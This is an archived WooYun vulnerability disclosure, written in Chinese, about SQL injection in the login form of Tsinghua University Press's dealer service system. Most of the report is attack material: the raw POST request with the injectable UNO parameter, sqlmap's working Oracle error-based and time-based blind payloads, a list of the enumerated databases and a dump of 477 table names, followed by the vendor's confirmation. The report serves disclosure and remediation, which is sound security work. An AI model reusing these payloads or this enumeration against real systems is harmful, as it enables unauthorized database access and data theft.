乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-08: 细节已通知厂商并且等待厂商处理中 2015-05-11: 厂商已经确认,细节仅向厂商公开 2015-05-21: 细节向核心白帽子及相关领域专家公开 2015-05-31: 细节向普通白帽子公开 2015-06-10: 细节向实习白帽子公开 2015-06-25: 细节向公众公开
欢迎 清华大学 加入 WooYun 大家庭
1.清华大学出版社 经销商服务系统
http://dealer.tup.tsinghua.edu.cn/
2.登录地方存在SQL注入,其中,UNO参数有问题
POST /login.asp HTTP/1.1Host: dealer.tup.tsinghua.edu.cnUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://dealer.tup.tsinghua.edu.cn/Cookie: safedog-flow-item=D961C6F6956C1C8A4C58645CF414C7F2; ASPSESSIONIDSCARBCCQ=CKHFGPPBDCKFIABCDLAEOFBNConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 30UNO=a&Password=a&Submit=++++++
3.运行sqlmap,确认注入存在
4.库:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: UNO Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS) Payload: UNO=a' AND 1575=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(111)||CHR(119)||CHR(100)||CHR(113)||(SELECT (CASE WHEN (1575=1575) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(97)||CHR(106)||CHR(100)||CHR(113)) AND 'aSTw'='aSTw&Password=a&Submit= Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: UNO=a' AND 4615=DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(107)||CHR(84)||CHR(85),5) AND 'wFUV'='wFUV&Password=a&Submit= ---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Oracleavailable databases [21]:[*] AURORA$JIS$UTILITY$[*] CB[*] CDZ_CBS[*] CTXSYS[*] CW[*] DEMO[*] ERP[*] FX[*] FXOLD[*] LAB[*] MDSYS[*] MTSSYS[*] ORDSYS[*] OSE$HTTP$ADMIN[*] OUTLN[*] QHCBS[*] SCOTT[*] SYS[*] SYSTEM[*] TOAD[*] ZJSD1
CDZ_CBS库中的表:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: UNO Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS) Payload: UNO=a' AND 1575=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(111)||CHR(119)||CHR(100)||CHR(113)||(SELECT (CASE WHEN (1575=1575) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(97)||CHR(106)||CHR(100)||CHR(113)) AND 'aSTw'='aSTw&Password=a&Submit= Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: UNO=a' AND 4615=DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(107)||CHR(84)||CHR(85),5) AND 'wFUV'='wFUV&Password=a&Submit= ---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: OracleDatabase: CDZ_CBS[477 tables]+--------------------------------+| CAO || EN_YS || EPC_CLI_COLLECTION || EPC_CLI_COLLECT_BY_EVENTID || EPC_CLI_COLLECT_BY_USERID || EPC_CLI_ENVIRONMENT || EPC_CLI_ENVIRONMENT_VERSION || EPC_CLI_FDF_FILE || EPC_CLI_FORMAT || EPC_CLI_JOB || EPC_CLI_NODE || EPC_CLI_PROGRESS || EPC_CLI_REP_USERS || EPC_CLI_SERVICE || EPC_CLI_USAGE || EPC_CLI_VERSION || EPC_MULTI_VIEWS || EPC_MULTI_VIEW_MAP || EPC_MVIEW_CATEGORY_MAP || EPC_PRIMARY_ITEMS || EPC_TDV_VERSION || EPC_VIEW || EPC_VIEW_CATEGORY || EPC_VIEW_ITEMS || EPC_VIEW_PREFERENCES || FX_YMXDDHG || FX_ZFJB || HS_BGFY || HS_BJCB || HS_BJXX || HS_BMYS || HS_CBCB || HS_CBSXX || HS_CSXX || HS_CWRCFY || HS_CYLCXX || HS_DZDXB || HS_FUNC || HS_GCCB || HS_HSBM || HS_JCCCB || HS_JCSXB || HS_KCLXB || HS_OAQQ || HS_PRINT_SET || HS_QUERY_TJ || HS_ROLES || HS_ROLES_GRANTS || HS_SBXZB || HS_SELECT_VALUES || HS_TEST || HS_TEST1 || HS_TEST2 || HS_TSBBB || HS_TSGXZ || HS_TSHJXX || HS_TSLB || HS_TSSP || HS_TSXX || HS_TSYCXX || HS_USERS || HS_USER_GRANTS || HS_USER_ROLES || HS_WZSMXZ || HS_XKLXB || HS_XMLYB || HS_XMMBB || HS_XTJBB || HS_XTXX || HS_YCBHZ || HS_YCBHZ_TEMP || HS_YQCB || HS_YQXMB || HS_YQZQMXB || HS_YXCB || HS_YZCB || HS_YZTZDB || HS_ZHBBCSSZ || HS_ZPLXB || HS_ZSYYB || HS_ZTFB || HS_ZYLXB || HS_ZYSFLB || HS_ZZK || KH_DQB || KH_FKB || KH_FKTSB || KH_JSCBQKB || KH_JSGTQKB || KH_JSHDQKB || KH_JSKCXXB || KH_JSLPQKB || KH_JSXTJHB || KH_JSXXB || KH_JSYJLYB || KH_JSYSQKB || KH_KCXXB || KH_KHDJ || KH_SFB || KH_XXB || KH_XXLX || KH_YXB || KH_YXDB || KH_YXDBQX || KH_ZJSZB || KH_ZJYSB || KH_ZYB || KH_ZYFL || KH_ZYXF || PLAN_TABLE || QK_ADMIN || QK_FAVORITE || QK_FILE || QK_NEWSARTICLE || RL_BZMCB || RL_GWMCB || RL_MZB || RL_XLB || RL_ZBMCB || RL_ZCB || RL_ZWB || RL_ZZMMB || SMP_DBREPORT_SQLSCRIPTS || SMP_DBREPORT_TEMPLATE || SMP_LMV_DISPLAY_OPTION || SMP_LMV_REDO_LOG || SMP_LMV_SEARCH_OBJECT || SMP_LMV_SEARCH_RESULT || SMP_LOG_SQL || SMP_STANDBY_CONFIG_INFO || SMP_STANDBY_SITE_INFO || SMP_VAI_DBCONFIG || SMP_VAR_EBU_ACTIVE_JOB_ || SMP_VAR_EBU_SAVED_JOB_ || SMP_VAR_OS_ACTIVE_JOB_ || SMP_VAR_OS_SAVED_JOB_ || SMP_VAR_SMR_ACTIVE_JOB_ || SMP_VAR_SMR_CHANNEL_DEVICE_ || SMP_VAR_SMR_DEFAULT_CHANNEL_ || SMP_VAR_SMR_LIST_DATABASES_ || SMP_VAR_SMR_RC_CONNECT_STRING_ || SMP_VAR_SMR_SAVED_JOB_ || SMP_VAR_SMR_TEMP_SCRIPTS_ || SMP_VBOR_BACKUP_CONFIGURATION || SMP_VBOR_BLOB || SMP_VBOR_CHANNELS_INFORMATION || SMP_VBOR_DEFAULT_CONFIG || SMP_VBOR_STRATEGY_INFORMATION || SMP_VBO_JOB_CONFIG_TABLE || SMP_VBO_REPORTS || SMP_VBO_REPORTS_CONFIG || SMP_VBO_REPORTS_TYPE_DEFN || SMP_VBO_REPORT_ELEMENTS || SMP_VBO_REPORT_INFO_SOURCES || SMP_VDD_OPERATIONS_TABLE || SMP_VDE_EVENT || SMP_VDE_EVENT_ARCHIVE || SMP_VDE_EVENT_ARCHIVE_PURGE || SMP_VDE_EVENT_DETAILS || SMP_VDE_EVENT_LOCK_TAB || SMP_VDE_EVENT_LOG || SMP_VDE_EVENT_OCCURRENCE || SMP_VDE_EVENT_OCCUR_DETAILS || SMP_VDE_EVENT_TARGET_ACK || SMP_VDE_EVENT_TARGET_DETAILS || SMP_VDE_EVENT_TARGET_INFO || SMP_VDE_EVENT_TARGET_STATE || SMP_VDE_EVENT_UPDOWN_QUEUE || SMP_VDE_METRIC_THRESHOLDS || SMP_VDE_NODE_UPDOWN_QUEUE || SMP_VDE_THRESHOLD_ASSOC || SMP_VDE_TRY_REMOVE_EVENT_QUEUE || SMP_VDF_MASLIST || SMP_VDG_EVENTID_MAP || SMP_VDG_EVENT_DELETE_LIST || SMP_VDG_EVENT_NOTIF_LIST || SMP_VDG_GATEWAY_MAP || SMP_VDG_JOBID_MAP || SMP_VDG_NODE_LIST || SMP_VDG_NODE_LOCK_TABLE || SMP_VDI_AOBJECT_NOTIFICATION || SMP_VDI_OBJECT_TABLE || SMP_VDI_POS || SMP_VDI_TARGET_PROPERTIES || SMP_VDJ_JOB || SMP_VDJ_JOB_LOCK || SMP_VDJ_JOB_LOG || SMP_VDJ_JOB_LOG_COMMENT || SMP_VDJ_JOB_LOG_INTERMED || SMP_VDJ_JOB_OUTPUT || SMP_VDJ_JOB_PER_TARGET || SMP_VDJ_JOB_TARGET || SMP_VDM_ADDRESS || SMP_VDM_GLOBAL_INFO || SMP_VDM_LAST_NOTIF_SEQ_PERTYPE || SMP_VDM_NOTIFICATION || SMP_VDM_NOTIFICATION_DETAILS || SMP_VDM_NOTIFICATION_NVPAIRS || SMP_VDM_NOTIFICATION_SERVICES || SMP_VDM_PAGING_CARRIER_INFO || SMP_VDM_SESSION_NOTIFTYPE_PAIR || SMP_VDN_BLACKOUTSCHEDULE || SMP_VDN_GROUP_GROUP || SMP_VDN_GROUP_LIST || SMP_VDN_GROUP_TARGET || SMP_VDN_NODE_LIST || SMP_VDN_NOTIFY || SMP_VDN_STATE || SMP_VDN_TARGET_LIST || SMP_VDN_TARGET_PROPERTIES || SMP_VDN_TARGET_TYPE_DEFN || SMP_VDO_JOBID_SERVICEID || SMP_VDP_NODES || SMP_VDP_NODE_INFO || SMP_VDP_NODE_INFO_VDD || SMP_VDP_NODE_OMS_MAP || SMP_VDP_OMS_NUM_NODES || SMP_VDP_OMS_REGION_MAP || SMP_VDP_PGSRV_REGION_MAP || SMP_VDP_REGIONS || SMP_VDR_REGISTRY || SMP_VDS_REPOS_VERSION || SMP_VDS_SESSIONS_TABLE || SMP_VDU_CALLBACK_TABLE || SMP_VDU_OBJECTS_TABLE || SMP_VDU_PRINCIPALS_TABLE || SMP_VDU_PRIVILEGE_TABLE || SMP_VDV_DEFAULT_NOTIFY_PREFS || SMP_VDV_DEFAULT_PERMISSIONS || SMP_VDV_GENERAL || SMP_VDV_MAPI_EMAIL || SMP_VDV_NOTIFICATION_SCHEDULE || SMP_VDV_PAGE || SMP_VDV_PAGING || SMP_VDV_PREFERRED_CREDENTIALS || SMP_VDV_SERVICE_PARMS || SMP_VDV_SMTP_EMAIL || SMP_VDV_USER || SMP_VDV_USER_LOCALE || SMP_VDV_USER_PREF || SMP_VTA_DB_APP_POSITION_ || SMP_VTC_LAYOUT_PROPERTIES || SMP_VTD_CLIENT_STATE || SMP_VTD_DG_LOCATION || SMP_VTD_HISTORICAL_LOCATION || SMP_VTM_CHART_DEFN || SMP_VTM_CHART_STATE_TARG_SPEC || SMP_VTM_DISPLAY_STATE || SMP_VTM_RECORDING_DATA || SMP_VTM_UDCHART_COLUMNS || SMP_VTM_UDCHART_DEFN || SMP_VTP_UDCLASS_COLUMNS || SMP_VTP_UDCLASS_DEFN || SMP_VXA_SYSTEM_PREFS || TB_ADMIN || TB_BOOK || TB_CATEGORY || TB_NEWSARTICLE || VBZ$CHANGE_PLANS || VBZ$COMPARISONS || VBZ$COMPARISON_RESULTS || VBZ$DB_OBJ_NAMES || VBZ$DESTINATIONS || VBZ$DIRECTIVES || VBZ$EDITED_SCRIPTS || VBZ$EXEMPLARS || VBZ$EX_UPDATES || VBZ$HISTORY || VBZ$IMPACT_LOG || VBZ$OBJECT_GRANTS || VBZ$OUTPUT_LOG || VBZ$ROLE_GRANTS || VBZ$SCHEMAMAPS || VBZ$SCRIPTS || VBZ$SYS_PRIV_GRANTS || VBZ$VERSION || VDK_APPLICATION || VDK_CLUSTER || VDK_CLUSTER_COLUMN || VDK_COLLECTION_ITEMS || VDK_COLUMN || VDK_CONSTRAINT || VDK_CONSTRAINT_COLUMN || VDK_DATABASE || VDK_DATAFILE || VDK_DATAFILE_STATS || VDK_DATAFILE_STATS_BEGIN || VDK_DBUSER || VDK_DELETE_QUEUE || VDK_FUNCTION || VDK_HOST_INFO || VDK_INDEX || VDK_INDEX_COLUMN || VDK_IND_PARTITIONS || VDK_IND_SUBPARTITIONS || VDK_INSTANCE || VDK_INSTANCE_BUFFER_STATS || VDK_INSTANCE_BUFFER_STATS_B || VDK_INSTANCE_PARAMS || VDK_INSTANCE_ROLLBACK_STATS || VDK_INSTANCE_SORT_STATS || VDK_INSTANCE_STATS || VDK_INSTANCE_STATS_BEGIN || VDK_LOG_TABLE || VDK_OBJECT || VDK_PART_INDEXES || VDK_PART_KEY_COLUMNS || VDK_PART_TABLES || VDK_REP_CONTROL || VDK_REQUEST || VDK_SEGMENT || VDK_SEQUENCE || VDK_SERVICE || VDK_SESSION || VDK_SQL || VDK_SQL_OBJECTS || VDK_SQL_STATEMENT_WORK || VDK_STORAGE_DEVICE || VDK_SUBPART_KEY_COLUMNS || VDK_SYNONYM || VDK_TABLE || VDK_TABLESPACE || VDK_TAB_PARTITIONS || VDK_TAB_SUBPARTITIONS || VDK_TMP_ANALYSIS_5 || VDK_TMP_ANALYSIS_6 || VDK_TMP_ANALYSIS_7 || VDK_TMP_JOURNAL_5 || VDK_TMP_JOURNAL_6 || VDK_TMP_JOURNAL_7 || VDK_TMP_RECOMMENDATION_5 || VDK_TMP_RECOMMENDATION_6 || VDK_TMP_RECOMMENDATION_7 || VDK_TMP_RULE_JOURNAL_5 || VDK_TMP_RULE_JOURNAL_6 || VDK_TMP_RULE_JOURNAL_7 || VDK_TMP_SQLCOLUMNREF_5 || VDK_TMP_SQLCOLUMNREF_6 || VDK_TMP_SQLCOLUMNREF_7 || VDK_TMP_SQLDEPEND_5 || VDK_TMP_SQLDEPEND_6 || VDK_TMP_SQLDEPEND_7 || VDK_TMP_SQLHINTREF_5 || VDK_TMP_SQLHINTREF_6 || VDK_TMP_SQLHINTREF_7 || VDK_TMP_SQLINDEX_5 || VDK_TMP_SQLINDEX_6 || VDK_TMP_SQLINDEX_7 || VDK_TMP_SQLTABLEREF_5 || VDK_TMP_SQLTABLEREF_6 || VDK_TMP_SQLTABLEREF_7 || VDK_TMP_SQLTABLE_5 || VDK_TMP_SQLTABLE_6 || VDK_TMP_SQLTABLE_7 || VDK_TMP_SQLTEXT_5 || VDK_TMP_SQLTEXT_6 || VDK_TMP_SQLTEXT_7 || VDK_TMP_SQLXREF_5 || VDK_TMP_SQLXREF_6 || VDK_TMP_SQLXREF_7 || VDK_USER_RULE || VMQ_DATABASE_PARAMS_DYNAMIC || VMQ_DATABASE_PARAMS_STATIC || VMQ_SQL_FAKE_INDEX || VMQ_SQL_FAKE_INDEX_COLUMNS || VMQ_SQL_IMPORT_STATS || VMQ_SQL_ITEM || VMQ_SQL_PLAN_COST_ALL || VMQ_SQL_PLAN_COST_FIRST || VMQ_SQL_PLAN_RULE || VMQ_SQL_STATS_COST_ALL || VMQ_SQL_STATS_COST_FIRST || VMQ_SQL_STATS_RULE || VMQ_SQL_TEXT || VMQ_SQL_UNQUALIFIED_NAMES || WWW_BBS || WWW_FORUM || WWW_FORUMTYPE || WWW_KXFZ || WWW_NEWS || WWW_NEWSCLASS || WWW_OA || WWW_OACLASS || WWW_PUBLICMESSAGE || WWW_REGUSER || WWW_SQ || WWW_TCLASS || WWW_USERS || WWW_XGTS || YZ_CYXSB || YZ_DKJCB || YZ_DKJCXMB || YZ_FMHTB || YZ_FMZLB || YZ_FUMOHTB || YZ_FUMOHTMXB || YZ_FWBB || YZ_FYTZB || YZ_FYTZMXB || YZ_FYTZZZB || YZ_KBB || YZ_MQHTB || YZ_MSHTB || YZ_MSHTMXB || YZ_MSZLB || YZ_PTHTB || YZ_QGHTB || YZ_RRHTB || YZ_SDDDB || YZ_SFHTB || YZ_SFHTMXB || YZ_SGJLB || YZ_SQHTB || YZ_TJGYHTB || YZ_TJHTMXB || YZ_TJZLB || YZ_TZFYJS || YZ_TZFYXMB || YZ_UVHTB || YZ_UVHTMXB || YZ_UVZLB || YZ_YAHTB || YZ_YHHTB || YZ_YSHTB || YZ_YSHTPBB || YZ_YSHTSSB || YZ_YSJCB || YZ_YSJCXMB || YZ_YSSSB || YZ_YSXMB || YZ_YWHTB || YZ_YWZLB || YZ_YZDB || YZ_YZDGYB || YZ_YZDSSAPB || YZ_YZDYSXMB || YZ_YZFYB || YZ_YZFYJS || YZ_YZFYJSB || YZ_YZFYJS_PRINT || YZ_YZFYMXB || YZ_YZFYMXB_TEST || YZ_YZYB || YZ_ZDFSB || YZ_ZDFYJS || YZ_ZDFYTZB || YZ_ZDHTB || YZ_ZDHTSFDJB || YZ_ZDHTYZDJB || YZ_ZDXMB || YZ_ZWCXB || ZZ_CKDB || ZZ_CYZZB || ZZ_GGB || ZZ_GYSB || ZZ_KZB || ZZ_MCB || ZZ_SLKB || ZZ_ZZBCDB || ZZ_ZZCGDDB || ZZ_ZZCKDB || ZZ_ZZDBDB || ZZ_ZZHTB || ZZ_ZZHTMXB || ZZ_ZZJSB || ZZ_ZZJXCB || ZZ_ZZJXCB1 || ZZ_ZZKCB || ZZ_ZZPDDB || ZZ_ZZRKDB || ZZ_ZZSHTZB || ZZ_ZZTJB || ZZ_ZZTJBTEST || ZZ_ZZTJMXB || ZZ_ZZTJMXBTEST || ZZ_ZZYMPHJC || ZZ_ZZYMPHJC1 |+--------------------------------+
危害等级:低
漏洞Rank:5
确认时间:2015-05-11 10:06
谢谢提醒,我们会尽快修复此漏洞。
暂无
